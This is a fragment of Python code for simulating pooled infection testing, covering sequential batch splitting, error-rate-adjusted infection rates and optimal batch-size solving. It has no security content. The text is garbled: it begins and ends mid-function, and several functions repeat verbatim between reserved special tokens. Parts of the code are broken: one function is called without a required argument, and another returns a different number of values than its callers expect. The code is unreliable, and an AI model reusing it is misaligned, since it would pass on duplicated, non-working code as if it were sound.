is the condition, where 1 stands for infection and 0 stands for uninfection
"""
random_table = np.random.binomial(size=size, p=p, n=1)
test_array = np.zeros((size, 2), dtype=int)
for i in range(size):
test_array[i, 0] = i
test_array[i, 1] = random_table[i]
return test_array
<|reserved_special_token_0|>
def parallel_batch_testing(subject_array, batch_size, typeII_error,
typeI_error, parallel_num, ind_repeat, seq):
"""
This function provides the parallel batch testing results for a given subject array.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
parallel_num (int): the number of parallel testing for the batch testing
ind_repeat (int): the number of potential individual testing for the positive batches
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
neg_batch = []
pos_batch = []
batch_consum = np.ceil(len(subject_array) / batch_size) * parallel_num
for temp_batch in np.array_split(subject_array, np.ceil(len(
subject_array) / batch_size)):
random_table = np.random.uniform(0, 1, (1, parallel_num))
if 1 in temp_batch[:, 1]:
if random_table.max() > typeII_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
elif random_table.min() < typeI_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([
])
pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([
])
neg_batch[:, 1] = 0
individual_test, individual_con = conventional_test(pos_batch,
typeII_error, typeI_error, repeat=ind_repeat, seq=seq)
result = np.concatenate((individual_test, neg_batch))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, batch_consum + individual_con, individual_con
def fixed_batch_seq_test(subject_array, stop_rule, p, batch_size,
typeII_error, typeI_error, repeat, prob_threshold=0.3, seq=True):
"""
This function provides the parallel batch testing results for a given subject array.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
stop_rule (int): the number of positive batches to enter the individual testing phase
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of potential individual testing for the positive crossings
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size}
temp_list.append(temp)
new_list = []
neg_array = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error)
temp0 = {'data': np.random.permutation(temp0), 'NB_Num': i[
'NB_Num'] + 1, 'PB_Num': i['PB_Num'], 'p': p0, 'batch_size':
batch_size}
temp1 = {'data': np.random.permutation(temp1), 'NB_Num': i[
'NB_Num'], 'PB_Num': i['PB_Num'] + 1, 'p': p1, 'batch_size':
batch_size}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con
def name_fun(n):
"""
input: stopping rule
output: finish nodes
"""
output = []
temp = ['']
for i in range(2 * n - 1):
temp_cur = []
for j in temp:
candidate_pos = j + '+'
candidate_neg = j + '-'
if str.count(candidate_pos, '+') >= n:
output.append(candidate_pos)
else:
temp_cur.append(candidate_pos)
if str.count(candidate_neg, '-') >= n:
output.append(candidate_neg)
else:
temp_cur.append(candidate_neg)
temp = temp_cur
neg_symbol = [x for x in output if str.count(x, '-') == n]
pos_symbol = [x for x in output if str.count(x, '+') == n]
return output, neg_symbol, pos_symbol
def seq_test_with_node(subject_array, stop_rule, p, batch_size,
typeII_error, typeI_error, repeat=1, prob_threshold=1, seq=True,
batch_limit=32):
"""
A function gives the test results to a subject array and the total number of
test-kit consumption and the individual testing number given the subject array,
the stop rule, the batch size, the probability of type II error, the probability of
Type I error, and the number of repeatition, the probability threshold, and
setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
stop_rule (int): the number of postive batches to enter individual testing
p (float): infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
batch_limit (int):
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
batch_num_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size, 'node': ''}
temp_list.append(temp)
new_list = []
neg_array = []
neg_node = []
pos_node = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error,
batch_limit=batch_limit)
temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[
'PB_Num'], 'p': p0, 'batch_size': n0, 'node': i['node'] + '-'}
temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[
'PB_Num'] + 1, 'p': p1, 'batch_size': n1, 'node': i['node'] +
'+'}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
batch_num_list.append(consum)
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
temp = [[x, j['node']] for x in j['data'][:, 0]]
neg_node.append(temp)
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
temp = [[x, k['node']] for x in k['data'][:, 0]]
pos_node.append(temp)
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
pos_node.extend(neg_node)
node = pos_node
node = sum(node, [])
node.sort()
node = [x[1] for x in node]
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con, node, batch_num_list
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@jit(parallel=True)
def conventional_test(subject_array, typeII_error, typeI_error, repeat=1,
seq=True):
"""
A function gives the test results to a subject array given the probability of
type II error, the probability of Type I error, and the number of repeatition,
and setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
Output:
test_result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
"""
if seq == True:
consum = 0
test_result = np.zeros(subject_array.shape, dtype=int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)
)
for i in range(len(subject_array)):
temp = 0
j = 0
subject = subject_array[i, 1]
while j < repeat and temp == 0:
random_num = random_table[i, j]
consum += 1
if subject == 1:
temp = 1 if random_num > typeII_error else 0
else:
temp = 1 if random_num < typeI_error else 0
j += 1
test_result[i, 0] = subject_array[i, 0]
test_result[i, 1] = temp
return test_result, consum
else:
test_result = np.zeros(subject_array.shape, dtype=int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)
)
for i in range(len(subject_array)):
temp = 0
for j in range(repeat):
temp_random = random_table[i, j]
if subject_array[i, 1] == 1:
temp_1 = 1 if temp_random > typeII_error else 0
elif subject_array[i, 1] == 0:
temp_1 = 1 if temp_random < typeI_error else 0
temp += temp_1
temp = 1 if temp >= repeat / 2 else 0
test_result[i, 0] = subject_array[i, 0]
test_result[i, 1] = temp
return test_result, len(subject_array) * repeat
@njit(parallel=True)
def parallel_test(subject_array, typeII_error, typeI_error, num):
test_result = np.zeros(subject_array.shape, dtype=int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], num))
for i in range(len(subject_array)):
subject = subject_array[i, 1]
if subject == 1:
temp = 1 if max(random_table[i, :]) > typeII_error else 0
elif subject == 0:
temp = 1 if min(random_table[i, :]) < typeI_error else 0
test_result[i, 0] = subject_array[i, 0]
test_result[i, 1] = temp
return test_result, len(subject_array) * num, len(subject_array) * num
def infection_rate_on_negative_batch(p, batch_size, typeII_error, typeI_error):
"""
Given infection rate, batch size, prob of type II error and prob of type I error, this
function gives the infection rate on the negative batch.
Input:
p (float): the infection rate
batch_size (int): the batch size
typeII_error (float): the prob of type II error
typeI_error (float): the prob of type I error
Output:
(float): the infection rate on the negative batch
"""
q = 1 - p
r = typeII_error * (1 - q ** batch_size) / ((1 - typeI_error) * q **
batch_size + typeII_error * (1 - q ** batch_size))
return p * r / (1 - q ** batch_size)
def infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error):
"""
Given infection rate, batch size, prob of type II error and prob of type I error, this
function gives the infection rate on the positive batch.
Input:
p (float): the infection rate
batch_size (int): the batch size
typeII_error (float): the prob of type II error
typeI_error (float): the prob of type I error
Output:
(float): the infection rate on the positive batch
"""
q = 1 - p
r = (1 - typeII_error) * (1 - q ** batch_size) / (typeI_error * q **
batch_size + (1 - typeII_error) * (1 - q ** batch_size))
return p * r / (1 - q ** batch_size)
def one_batch_test_solver(prevalence_rate, typeII_error, typeI_error,
n_initial_guess=2):
"""
A function gives (float) the best batch size for one batch test given the infection rate
Inputs:
prevalence_rate(float): infection rate
typeII_error(float): the prob of type II error
typeI_error(float): the prob of type I error
n_initial_guess(float): the initial guess
Output:
(float): the optimal batch size
"""
q = 1 - prevalence_rate
func = lambda n: n * q ** (n / 2) - (-(1 - typeII_error - typeI_error) *
np.log(q)) ** (-1 / 2)
n_solution = fsolve(func, n_initial_guess)
return float(n_solution)
<|reserved_special_token_0|>
def neg_pos_batch_split(subject_array, batch_size, typeII_error, typeI_error):
"""
A function gives a list of sujects on the negative batch(es),
a list of subjects on the postive batch(es) and the test-kit
consumption given the probability of type II error, the
probability of Type I error.
Input:
subject_array (Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
Output:
neg_batch (Numpy Array): an array of subjects on the negative batch(es)
pos_batch (Numpy Array): an array of subjects on the postive batch(es)
test_consum (int): the number of test-kit consumptions
"""
neg_batch = []
pos_batch = []
test_consum = np.ceil(len(subject_array) / batch_size)
random_table = np.random.uniform(0, 1, int(test_consum))
i = 0
for temp_batch in np.array_split(subject_array, test_consum):
if 1 in temp_batch[:, 1]:
if random_table[i] > typeII_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
elif random_table[i] > typeI_error:
neg_batch.append(temp_batch)
else:
pos_batch.append(temp_batch)
i += 1
neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([
])
pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([
])
return neg_batch, pos_batch, test_consum
def helpfunction(subject_array, p, batch_size, typeII_error, typeI_error,
batch_limit):
"""
The helpfunction is a handy function to give the list of subjects on the
negative batch(es), the list of subjects on the postive batch(es), the
test-kit consumption, the infection rate on the negative batches, the
infection rate on the positive batches, the optimal batch size for
negative batches and the optimal batch size for positive batches.
Input:
subject_array (Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
p (float): Infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
batch_limit (int): batch size upper limit
Output:
temp0 (Numpy Array): an array of subjects on the negative batch(es)
temp1 (Numpy Array): an array of subjects on the postive batch(es)
temp_con (int): the number of test-kit consumptions
p0 (float): the infection rate on the negative batches
p1 (float): the infection rate on the positive batches
n0 (float): the optimal batch size for the negative batches
n1 (float): the optimal batch size for the positive batches
"""
batch_size = min(batch_size, batch_limit)
p0 = infection_rate_on_negative_batch(p, batch_size, typeII_error,
typeI_error)
p1 = infection_rate_on_positive_batch(p, batch_size, typeII_error,
typeI_error)
n0 = one_batch_test_int_solver(p0, typeII_error, typeI_error, batch_limit)
n1 = one_batch_test_int_solver(p1, typeII_error, typeI_error, batch_limit)
if subject_array == np.array([]):
return np.array([]), np.array([]), p0, p1, n0, n1
temp0, temp1, temp_con = neg_pos_batch_split(subject_array, batch_size,
typeII_error, typeI_error)
return temp0, temp1, temp_con, p0, p1, n0, n1
def seq_test(subject_array, stop_rule, p, batch_size, typeII_error,
typeI_error, repeat=1, prob_threshold=1, seq=True, batch_limit=32):
"""
A function gives the test results to a subject array and the total number of
test-kit consumption and the individual testing number given the subject array,
the stop rule, the batch size, the probability of type II error, the probability of
Type I error, and the number of repeatition, the probability threshold, and
setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
stop_rule (int): the number of postive batches to enter individual testing
p (float): infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
batch_limit (int):
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size}
temp_list.append(temp)
new_list = []
neg_array = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error,
batch_limit=batch_limit)
temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[
'PB_Num'], 'p': p0, 'batch_size': n0}
temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[
'PB_Num'] + 1, 'p': p1, 'batch_size': n1}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con
<|reserved_special_token_0|>
def specificity_score(y_true, y_pred):
"""
A function provides specificty given the prediction and the truth
"""
tn, fp, _, _ = confusion_matrix(y_true=y_true, y_pred=y_pred).ravel()
return tn / (tn + fp)
@jit(parallel=True)
def data_gen(size, p):
"""
data_gen provides a faster way to generate a random population with
infection rate p.
Input:
size (int): the size of population
p (float): the infection rate
Output:
test_array (array): the first column is for id and the second column
is the condition, where 1 stands for infection and 0 stands for uninfection
"""
random_table = np.random.binomial(size=size, p=p, n=1)
test_array = np.zeros((size, 2), dtype=int)
for i in range(size):
test_array[i, 0] = i
test_array[i, 1] = random_table[i]
return test_array
def test_result(data, seq_test, **kwargs):
"""
a helper function provides convenient results for a given test method with its **kwargs
Input:
data (array or list of arrays)
seq_test (test_method object): could be seq_test, matrix_test and other test_method objects
Output:
result (DataFrame): a dataframe contains important evaluation metrics for the test method
"""
if isinstance(data, list) == False:
pred, consum, ind_con = seq_test(data, **kwargs)
result = {'acc': np.mean(pred[:, 1] == data[:, 1]), 'sens':
recall_score(data[:, 1], pred[:, 1]), 'spec': specificity_score
(data[:, 1], pred[:, 1]), 'PPV': precision_score(data[:, 1],
pred[:, 1]), 'NPV': npv_score(data[:, 1], pred[:, 1]),
'test_consum': consum, 'ind_consum': ind_con, 'batch_consum':
consum - ind_con}
return result
else:
length = len(data)
acc = np.zeros(length)
sens = np.zeros(length)
spec = np.zeros(length)
ppv = np.zeros(length)
npv = np.zeros(length)
test_consum = np.zeros(length)
ind_consum = np.zeros(length)
batch_consum = np.zeros(length)
for i in range(length):
pred, consum, ind_con = seq_test(data[i], **kwargs)
acc[i] = np.mean(pred[:, 1] == data[i][:, 1])
sens[i] = recall_score(data[i][:, 1], pred[:, 1])
spec[i] = specificity_score(data[i][:, 1], pred[:, 1])
ppv[i] = precision_score(data[i][:, 1], pred[:, 1])
npv[i] = npv_score(data[i][:, 1], pred[:, 1])
test_consum[i] = consum
ind_consum[i] = ind_con
batch_consum[i] = consum - ind_con
result = {'acc': acc, 'sens': sens, 'spec': spec, 'PPV': ppv, 'NPV':
npv, 'test_consum': test_consum, 'ind_consum': ind_consum,
'batch_consum': batch_consum}
return pd.DataFrame(result)
<|reserved_special_token_0|>
def parallel_batch_testing(subject_array, batch_size, typeII_error,
typeI_error, parallel_num, ind_repeat, seq):
"""
This function provides the parallel batch testing results for a given subject array.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
parallel_num (int): the number of parallel testing for the batch testing
ind_repeat (int): the number of potential individual testing for the positive batches
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
neg_batch = []
pos_batch = []
batch_consum = np.ceil(len(subject_array) / batch_size) * parallel_num
for temp_batch in np.array_split(subject_array, np.ceil(len(
subject_array) / batch_size)):
random_table = np.random.uniform(0, 1, (1, parallel_num))
if 1 in temp_batch[:, 1]:
if random_table.max() > typeII_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
elif random_table.min() < typeI_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([
])
pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([
])
neg_batch[:, 1] = 0
individual_test, individual_con = conventional_test(pos_batch,
typeII_error, typeI_error, repeat=ind_repeat, seq=seq)
result = np.concatenate((individual_test, neg_batch))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, batch_consum + individual_con, individual_con
def fixed_batch_seq_test(subject_array, stop_rule, p, batch_size,
typeII_error, typeI_error, repeat, prob_threshold=0.3, seq=True):
"""
This function provides the parallel batch testing results for a given subject array.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
stop_rule (int): the number of positive batches to enter the individual testing phase
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of potential individual testing for the positive crossings
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size}
temp_list.append(temp)
new_list = []
neg_array = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error)
temp0 = {'data': np.random.permutation(temp0), 'NB_Num': i[
'NB_Num'] + 1, 'PB_Num': i['PB_Num'], 'p': p0, 'batch_size':
batch_size}
temp1 = {'data': np.random.permutation(temp1), 'NB_Num': i[
'NB_Num'], 'PB_Num': i['PB_Num'] + 1, 'p': p1, 'batch_size':
batch_size}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con
def name_fun(n):
"""
input: stopping rule
output: finish nodes
"""
output = []
temp = ['']
for i in range(2 * n - 1):
temp_cur = []
for j in temp:
candidate_pos = j + '+'
candidate_neg = j + '-'
if str.count(candidate_pos, '+') >= n:
output.append(candidate_pos)
else:
temp_cur.append(candidate_pos)
if str.count(candidate_neg, '-') >= n:
output.append(candidate_neg)
else:
temp_cur.append(candidate_neg)
temp = temp_cur
neg_symbol = [x for x in output if str.count(x, '-') == n]
pos_symbol = [x for x in output if str.count(x, '+') == n]
return output, neg_symbol, pos_symbol
def seq_test_with_node(subject_array, stop_rule, p, batch_size,
typeII_error, typeI_error, repeat=1, prob_threshold=1, seq=True,
batch_limit=32):
"""
A function gives the test results to a subject array and the total number of
test-kit consumption and the individual testing number given the subject array,
the stop rule, the batch size, the probability of type II error, the probability of
Type I error, and the number of repeatition, the probability threshold, and
setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
stop_rule (int): the number of postive batches to enter individual testing
p (float): infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
batch_limit (int):
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
batch_num_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size, 'node': ''}
temp_list.append(temp)
new_list = []
neg_array = []
neg_node = []
pos_node = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error,
batch_limit=batch_limit)
temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[
'PB_Num'], 'p': p0, 'batch_size': n0, 'node': i['node'] + '-'}
temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[
'PB_Num'] + 1, 'p': p1, 'batch_size': n1, 'node': i['node'] +
'+'}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
batch_num_list.append(consum)
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
temp = [[x, j['node']] for x in j['data'][:, 0]]
neg_node.append(temp)
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
temp = [[x, k['node']] for x in k['data'][:, 0]]
pos_node.append(temp)
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
pos_node.extend(neg_node)
node = pos_node
node = sum(node, [])
node.sort()
node = [x[1] for x in node]
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con, node, batch_num_list
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@jit(parallel=True)
def conventional_test(subject_array, typeII_error, typeI_error, repeat=1,
seq=True):
"""
A function gives the test results to a subject array given the probability of
type II error, the probability of Type I error, and the number of repeatition,
and setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
Output:
test_result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
"""
if seq == True:
consum = 0
test_result = np.zeros(subject_array.shape, dtype=int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)
)
for i in range(len(subject_array)):
temp = 0
j = 0
subject = subject_array[i, 1]
while j < repeat and temp == 0:
random_num = random_table[i, j]
consum += 1
if subject == 1:
temp = 1 if random_num > typeII_error else 0
else:
temp = 1 if random_num < typeI_error else 0
j += 1
test_result[i, 0] = subject_array[i, 0]
test_result[i, 1] = temp
return test_result, consum
else:
test_result = np.zeros(subject_array.shape, dtype=int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)
)
for i in range(len(subject_array)):
temp = 0
for j in range(repeat):
temp_random = random_table[i, j]
if subject_array[i, 1] == 1:
temp_1 = 1 if temp_random > typeII_error else 0
elif subject_array[i, 1] == 0:
temp_1 = 1 if temp_random < typeI_error else 0
temp += temp_1
temp = 1 if temp >= repeat / 2 else 0
test_result[i, 0] = subject_array[i, 0]
test_result[i, 1] = temp
return test_result, len(subject_array) * repeat
@njit(parallel=True)
def parallel_test(subject_array, typeII_error, typeI_error, num):
test_result = np.zeros(subject_array.shape, dtype=int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], num))
for i in range(len(subject_array)):
subject = subject_array[i, 1]
if subject == 1:
temp = 1 if max(random_table[i, :]) > typeII_error else 0
elif subject == 0:
temp = 1 if min(random_table[i, :]) < typeI_error else 0
test_result[i, 0] = subject_array[i, 0]
test_result[i, 1] = temp
return test_result, len(subject_array) * num, len(subject_array) * num
def infection_rate_on_negative_batch(p, batch_size, typeII_error, typeI_error):
"""
Given infection rate, batch size, prob of type II error and prob of type I error, this
function gives the infection rate on the negative batch.
Input:
p (float): the infection rate
batch_size (int): the batch size
typeII_error (float): the prob of type II error
typeI_error (float): the prob of type I error
Output:
(float): the infection rate on the negative batch
"""
q = 1 - p
r = typeII_error * (1 - q ** batch_size) / ((1 - typeI_error) * q **
batch_size + typeII_error * (1 - q ** batch_size))
return p * r / (1 - q ** batch_size)
def infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error):
"""
Given infection rate, batch size, prob of type II error and prob of type I error, this
function gives the infection rate on the positive batch.
Input:
p (float): the infection rate
batch_size (int): the batch size
typeII_error (float): the prob of type II error
typeI_error (float): the prob of type I error
Output:
(float): the infection rate on the positive batch
"""
q = 1 - p
r = (1 - typeII_error) * (1 - q ** batch_size) / (typeI_error * q **
batch_size + (1 - typeII_error) * (1 - q ** batch_size))
return p * r / (1 - q ** batch_size)
def one_batch_test_solver(prevalence_rate, typeII_error, typeI_error,
n_initial_guess=2):
"""
A function gives (float) the best batch size for one batch test given the infection rate
Inputs:
prevalence_rate(float): infection rate
typeII_error(float): the prob of type II error
typeI_error(float): the prob of type I error
n_initial_guess(float): the initial guess
Output:
(float): the optimal batch size
"""
q = 1 - prevalence_rate
func = lambda n: n * q ** (n / 2) - (-(1 - typeII_error - typeI_error) *
np.log(q)) ** (-1 / 2)
n_solution = fsolve(func, n_initial_guess)
return float(n_solution)
def one_batch_test_int_solver(prevalence_rate, typeII_error, typeI_error,
batch_limit, n_initial_guess=2):
"""
A function gives (int) the best batch size for one batch test given the infection rate
Inputs:
prevalence_rate(float): infection rate
n_initial_guess(float): the initial guess
typeII_error(float): the prob of type II error
typeI_error(float): the prob of type I error
n_initial_guess:
batch_limit (int): the upper limit of batch size
Output:
(int): the optimal batch size
"""
sol_float = one_batch_test_solver(prevalence_rate, typeII_error,
typeI_error, n_initial_guess)
floor, ceil = np.floor(sol_float), np.ceil(sol_float)
